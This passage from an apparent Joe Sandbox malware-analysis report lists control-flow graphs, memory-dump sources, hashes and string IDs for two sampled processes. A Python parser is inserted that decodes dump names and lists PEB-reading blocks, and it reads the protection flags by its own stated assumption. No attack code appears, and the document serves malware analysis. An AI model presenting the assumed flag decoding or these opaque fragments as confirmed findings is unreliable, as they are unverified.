                                                                        639 22a6a346-22a6a35e call 22a6b6c0 637->639
                                                                        646 22a6a367-22a6a36c 639->646
                                                                        647 22a6a360-22a6a364 639->647
                                                                        643 22ac2b94-22ac2b9f call 22aeff81 640->643 641->643
                                                                        651 22ac2ba7-22ac2bb0 GetPEB 643->651
                                                                        649 22a6a3ae-22a6a3b3 646->649
                                                                        650 22a6a36e-22a6a371 646->650
                                                                        652 22a6a394-22a6a39b call 22a73d20 649->652 650->649
                                                                        653 22a6a373-22a6a376 650->653
                                                                        657 22ac2bbb-22ac2bc2 call 22a73d20 651->657 652->651
                                                                        659 22a6a3a1-22a6a3a4 652->659 653->649
                                                                        655 22a6a378-22a6a37e 653->655 655->649
                                                                        658 22a6a380-22a6a385 655->658
                                                                        664 22ac2bc4-22ac2bcd GetPEB 657->664
                                                                        665 22ac2bd3-22ac2bde call 22aeff81 657->665 658->649
                                                                        661 22a6a387-22a6a392 658->661 659->657
                                                                        662 22a6a3aa-22a6a3ac 659->662 661->652 662->647 664->665 665->635
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 22A6A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 22A6A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 9e2965b949a66f9874ba74051b40c5d16053778762ca04f6604af3e89f54919f
                                                                        • Instruction ID: 114208e42a1760fd2cb376631926eade639b46ab6be2988ca7633f0e240613d5
                                                                        • Opcode Fuzzy Hash: 9e2965b949a66f9874ba74051b40c5d16053778762ca04f6604af3e89f54919f
                                                                        • Instruction Fuzzy Hash: 6541DE34A44745CBDB01CF69CA80B7E77B4FF85704F1481A5EA15DBA92E379CA80CB51

                                                                        Control-flow Graph

                                                                        control_flow_graph
                                                                        668 22a9329e-22a932d6 call 22a75990
                                                                        671 22a932dc-22a932eb 668->671
                                                                        672 22a9338e-22a93390 668->672
                                                                        673 22a9336b-22a9337b 671->673
                                                                        674 22a932ed 671->674
                                                                        675 22a93355-22a93366 call 22aa4c30 672->675
                                                                        677 22a932ef-22a9332a call 22aa2e60 673->677 674->677
                                                                        681 22a9332c-22a93341 GetPEB call 22a73ca0 677->681
                                                                        682 22a93380-22a93387 677->682
                                                                        688 22a93343-22a93349 681->688
                                                                        689 22a93367-22a93369 681->689 682->681
                                                                        683 22a93389-22ad29f4 call 22aa2b60 GetPEB call 22a73ca0 682->683 683->681
                                                                        692 22a9334b-22a93351 688->692
                                                                        693 22a93392-22a93399 688->693
                                                                        690 22a93353 689->690 690->675 692->690 692->693 693->690
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local\$@
                                                                        • API String ID: 0-380025441
                                                                        • Opcode ID: 6026f2dd9ef1ef07332d00184605534bd27a5a7e1edce8d3fecacaada90d42ef
                                                                        • Instruction ID: 7daf705d2ef3e24226fc2bf0c73cf9826acf38871cd35462d646d483af64c9ca
                                                                        • Opcode Fuzzy Hash: 6026f2dd9ef1ef07332d00184605534bd27a5a7e1edce8d3fecacaada90d42ef
                                                                        • Instruction Fuzzy Hash: 3E317E765893049FC311CF29C580A5BBBF8FBC4754F40096EF9948BA10DA34DD04CB92

                                                                        Control-flow Graph

                                                                        control_flow_graph
                                                                        696 22a592ff-22a59312
                                                                        697 22a59314-22a59325 RtlDebugPrintTimes 696->697
                                                                        698 22a5932d-22a59339 call 22a59353 696->698 697->698
                                                                        701 22a5934f-22a59352 698->701
                                                                        702 22a5933b-22a5934a GetPEB call 22a73ca0 698->702 702->701
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 260fe606b8edb328fc609a0cd26ed7e1f0b87067435bd0707fba7f9c334e116d
                                                                        • Instruction ID: a09acc483d3257b40f453e771637a5023eb7d9021b0ec2f531bb8c32af8ac236
                                                                        • Opcode Fuzzy Hash: 260fe606b8edb328fc609a0cd26ed7e1f0b87067435bd0707fba7f9c334e116d
                                                                        • Instruction Fuzzy Hash: FEF0F032240740ABD7319B19CE08F8BBBFDEF94710F08055CA54687490C6B0A908C690
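Added example, not code from Joe Sandbox or its IDA plugin: a small Python parser for the two record types that repeat through this section, the dump file names in the "Memory Dump Source" blocks and the flattened control_flow_graph text. The fourth dotted field of a dump name is the region base (the report's own "Offset: 22A30000" line confirms it); reading the fifth, sixth and seventh fields as Win32 PAGE_* protection, MEM_* state and MEM_* type values is this example's assumption, not something the report states. Under that reading 00000040/00001000/00020000 decodes to a committed, private PAGE_EXECUTE_READWRITE region, which is what unpacked or injected code looks like, as opposed to a mapped image. The dump name and graph text embedded below are copied verbatim from the DebugPrintTimes record above.

```python
"""Parse two record types from a Joe Sandbox analysis report: memory-dump file
names ("Memory Dump Source") and the flattened control_flow_graph text.
Added example for this page; not part of Joe Sandbox or its IDA plugin.
"""
import re

# Win32 PAGE_* protection values (winnt.h). Treating the fifth dotted field of
# the dump name as one of these is an assumption of this example.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEM_* state and type values (winnt.h); same assumption for fields six and seven.
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.(?P<rest>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_sdmp_name(name):
    """Split a dump file name into its dotted fields and decode the flag fields."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError("not a Joe Sandbox dump name: %r" % name)
    protect, state, mtype = (int(m[k], 16) for k in ("protect", "state", "type"))
    return {
        "process_index": int(m["proc"], 16),
        "dump_index": int(m["dump"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "state": MEM_STATE.get(state, hex(state)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
    }


EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_RE = re.compile(r"^\d{1,7}$")  # block ids are short decimal numbers


def parse_cfg(text):
    """Turn 'control_flow_graph <id> <start>-<end> [labels...] <a>-><b> ...' into a
    dict of blocks and a list of edges. Labels are API names recognised by the
    plugin (GetPEB, RtlDebugPrintTimes, ...) or 'call <addr>' for internal calls.
    Works on the one-line form and on a form split one block per line."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((int(edge[1]), int(edge[2])))
        elif NODE_RE.match(tok):
            cur = int(tok)
            i += 1  # the token after a block id is always its address range
            start, _, end = tokens[i].partition("-")
            blocks[cur] = {"start": int(start, 16), "end": int(end or start, 16), "calls": []}
        elif tok == "call":
            i += 1  # 'call <hex>' is an internal call target
            blocks[cur]["calls"].append("sub_" + tokens[i].upper())
        else:
            blocks[cur]["calls"].append(tok)  # API label attached by the plugin
        i += 1
    return blocks, edges


def callers_of(blocks, api):
    """Start addresses of every block whose label list contains `api`."""
    return sorted(b["start"] for b in blocks.values() if api in b["calls"])


def successors(edges, block_id):
    """Block ids reachable from `block_id` by one edge."""
    return sorted(dst for src, dst in edges if src == block_id)


# Copied verbatim from this report section (dump name and DebugPrintTimes graph).
DUMP_NAME = "00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp"
CFG_TEXT = ("control_flow_graph 696 22a592ff-22a59312 697 22a59314-22a59325 RtlDebugPrintTimes "
            "696->697 698 22a5932d-22a59339 call 22a59353 696->698 697->698 701 22a5934f-22a59352 "
            "698->701 702 22a5933b-22a5934a GetPEB call 22a73ca0 698->702 702->701")

if __name__ == "__main__":
    print(parse_sdmp_name(DUMP_NAME))
    blocks, edges = parse_cfg(CFG_TEXT)
    for bid, b in sorted(blocks.items()):
        print("%d %08x-%08x calls=%s succ=%s" % (bid, b["start"], b["end"], b["calls"], successors(edges, bid)))
    print("blocks touching the PEB:", [hex(a) for a in callers_of(blocks, "GetPEB")])
```

Run as a script it prints the decoded dump name and, per block, the labels and successors of the DebugPrintTimes graph. Feeding every control_flow_graph line of a report through parse_cfg and collecting callers_of(blocks, "GetPEB") gives, in one pass, the basic blocks to look at when cross-checking the "Contains functionality to read the PEB" signature listed at the top of this report.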
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7240e65f03ae9fc22e25736e15683e5ddea7bfffbcf77add54be727e0368cb0a
                                                                        • Instruction ID: e2d2cb8d097e610ecdc2f3cfcce7bad6c677afc23e459f8c7731b622230d5ac9
                                                                        • Opcode Fuzzy Hash: 7240e65f03ae9fc22e25736e15683e5ddea7bfffbcf77add54be727e0368cb0a
                                                                        • Instruction Fuzzy Hash: FD815971A00709AFDB11CFA6CA80BDEBBFAFF88354F10442AE555A7651D730AD45CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d590ff0fa7cee1df18fc6916afe01121ff311fb00118cf11ddd9e2f907ff7df
                                                                        • Instruction ID: 4468042bc509eb613e5e96908b1c7bbb8e84afa5a36159e196e77a1cb3d56c9e
                                                                        • Opcode Fuzzy Hash: 7d590ff0fa7cee1df18fc6916afe01121ff311fb00118cf11ddd9e2f907ff7df
                                                                        • Instruction Fuzzy Hash: 6671F232240701AFD722DF28CA90F5AB7F5FF40B65F104918F6658BAA0D77AE944CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 13ee7e90f6b4712ef37ba3fad34f0d35ba6e0c7ce47069d99704bba1fa85b26b
                                                                        • Instruction ID: a9ef6030b59f9924d5d07bc1dc1c22de6ee6d75824884e19520ebe3680b3ee6e
                                                                        • Opcode Fuzzy Hash: 13ee7e90f6b4712ef37ba3fad34f0d35ba6e0c7ce47069d99704bba1fa85b26b
                                                                        • Instruction Fuzzy Hash: 6B613A31604F818FD321CF64C694B5AB7E0FF98708F244A6DE99D8B291DB35E806C791
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction ID: 15c5f8674c83ba02b6daa08b5d9ac08e3865e77c628fd85aea4738c8065f2732
                                                                        • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                        • Instruction Fuzzy Hash: FA310331A08344AFDB118B68CD80F9EBFF9AF14350F0442A6E855D7B52D7B4D984CBA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                        • Instruction ID: 73dce8c7435dfa7827a6fc02ba0011d8b10d824684e7c30eb7e042fa51360a9e
                                                                        • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                        • Instruction Fuzzy Hash: 9831BCB160834A8FCB05DF18D940A6A7BE9FF99710F00056AF850DB7A1C730DC00CBA6
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fc01fb02f2d96b90c60e96bf66729137bce37e8db0aa1fe6dd3733303fefc58
                                                                        • Instruction ID: 8fbd930094609f3b30cccc270c25860b4c7a423b0e869a064d660c16bff3c90e
                                                                        • Opcode Fuzzy Hash: 0fc01fb02f2d96b90c60e96bf66729137bce37e8db0aa1fe6dd3733303fefc58
                                                                        • Instruction Fuzzy Hash: 2021D3726443459BC301DF69CA84F6BFBECAF90744F044466BE85EB951D730C90AC6A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                        • Instruction ID: 9c3bed519216613802435c59681272287601e062c1993b479dcd0b66c5a5f53e
                                                                        • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                        • Instruction Fuzzy Hash: E3016D72280705BFE6119F61CE90EA2FB7DFF64794F500525F25046960C766ACA0CAA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 651bad411510aff1270d2d72552cbb3cb57444d138a9d472b7171bea30eba57d
                                                                        • Instruction ID: 31bc01db04861eb219cb473ed24a503cebcd43d54d1dbea2eedafb97d5e2e9da
                                                                        • Opcode Fuzzy Hash: 651bad411510aff1270d2d72552cbb3cb57444d138a9d472b7171bea30eba57d
                                                                        • Instruction Fuzzy Hash: C2F0A472F50348ABD704DFB9D515AAEB7B8EF44710F008456F501EB690DA74DA01C761
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 10e6a6cb8314cda92db43b483105315e1891231ec41bf004bdf7212f52c8fcf8
                                                                        • Instruction ID: da145c46a1c2f601aa7b8f82b0016354b9b795bef782bcad053a625850c3a2b5
                                                                        • Opcode Fuzzy Hash: 10e6a6cb8314cda92db43b483105315e1891231ec41bf004bdf7212f52c8fcf8
                                                                        • Instruction Fuzzy Hash: 4DF05E70B50748ABDB04DFA9DA15EAEB7B4FF18304F408859B941EB291EB74E900CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b23dd7a2ac5a69873f0b64e6c38c60e7e9372c7b439486127dc38fa349b798c
                                                                        • Instruction ID: 11957a91b1a0ac61ace7902b5dfc7960f83c9bbc8393ae7fe94045e9d4935cd0
                                                                        • Opcode Fuzzy Hash: 4b23dd7a2ac5a69873f0b64e6c38c60e7e9372c7b439486127dc38fa349b798c
                                                                        • Instruction Fuzzy Hash: A6F05E70A50788ABDB04DFB9D656E6EB7B4EF18304F408459B901EB291EA74EA00CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e2fec76dcee738e1c739839fd8e3058a51f5a4a1702bd67bcf531b050a41f76c
                                                                        • Instruction ID: ee22b62e9a99068c48d961d65070d1ee24ea9f7abafeec92eb858cf0f50e9078
                                                                        • Opcode Fuzzy Hash: e2fec76dcee738e1c739839fd8e3058a51f5a4a1702bd67bcf531b050a41f76c
                                                                        • Instruction Fuzzy Hash: B7F0C934651B81CBE71ACF04C1E1B5173B9FB45B84F5004A8D8464FFA1C73A9942CA40
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 22A30000, based on PE: true
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B59000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022B5D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000006.00000002.3693643326.0000000022BCE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_22a30000_Stemmeurnes.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction ID: 7d932864685037fe929d1136e94e4f92367d1872bf4910d9609a83ef2bc4dbc6
                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                        • Instruction Fuzzy Hash: ABD0C93A616F80CFD206CB08C6A1F1A73B4BB44B84F810490E541CBF22E62CD940CA44
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7319d59db7b4e06e0f9674278f0539f904688b6b9bb3370e4803de1a27b97b8
                                                                        • Instruction ID: b47cf16508ab06073c217c04de0d4799b09caa25abe9dec67ff0e0a9bbf0e354
                                                                        • Opcode Fuzzy Hash: b7319d59db7b4e06e0f9674278f0539f904688b6b9bb3370e4803de1a27b97b8
                                                                        • Instruction Fuzzy Hash: E3319411A593F14DD31E836D08BD675AFC24F5720174EC2EEDADA5F2E3C4888419D3A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$ 4$(2$*\$/_$3U$:$:$J9$J]$Yj$cp$iu$jg$m$w`$~+$~[
                                                                        • API String ID: 0-1778842444
                                                                        • Opcode ID: 93d0ce2f71425aae2626d8af6dee784df82cb3efb50ffb450ebbba99086de9ca
                                                                        • Instruction ID: 8af2bd0fc4a211f075ab2eb77930a731d0abc9cf5a068ef3d58defdb861d2e03
                                                                        • Opcode Fuzzy Hash: 93d0ce2f71425aae2626d8af6dee784df82cb3efb50ffb450ebbba99086de9ca
                                                                        • Instruction Fuzzy Hash: EE1292B0D05268CBEB25CF55CAA4BDDBBB2BF44348F1081DAD2497B281C7B55A89CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6$O$S$\$s
                                                                        • API String ID: 0-3854637164
                                                                        • Opcode ID: 737269502d40f39a4e925d1e8c1d2850c38414c8e7089ec4e76dc4922a8c63b8
                                                                        • Instruction ID: 3a3fd925db806982f563c689edc9cdb4657bc36d14788ddaac26140a0e237312
                                                                        • Opcode Fuzzy Hash: 737269502d40f39a4e925d1e8c1d2850c38414c8e7089ec4e76dc4922a8c63b8
                                                                        • Instruction Fuzzy Hash: 1451AFB2D00119ABDB10DB94DC84BEFB379EF44355F4441ADEA0C96141E770AA58CFE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8730710e20e5dcc2a22011382145b6a3544650baa3ee4f93d368119a8c63515
                                                                        • Instruction ID: 727d419d78573b017f8856223cbac90baac5536701203ea063c0d1638091ab08
                                                                        • Opcode Fuzzy Hash: d8730710e20e5dcc2a22011382145b6a3544650baa3ee4f93d368119a8c63515
                                                                        • Instruction Fuzzy Hash: BF413FB1D11219AFDB04CF99DC81AEEBBBDEF49B50F10415AFA14E6241D7B09640CBE0
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_2d70000_MLvvJtVcRex.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bba4785f8d05c4a076c1950401058ea4743479d876345d3c590acef88ece51e7
                                                                        • Instruction ID: 5ecdef304642a985461e98d9e2771821c9ac1eefbe0898c4dab2ec181b10937c
                                                                        • Opcode Fuzzy Hash: bba4785f8d05c4a076c1950401058ea4743479d876345d3c590acef88ece51e7
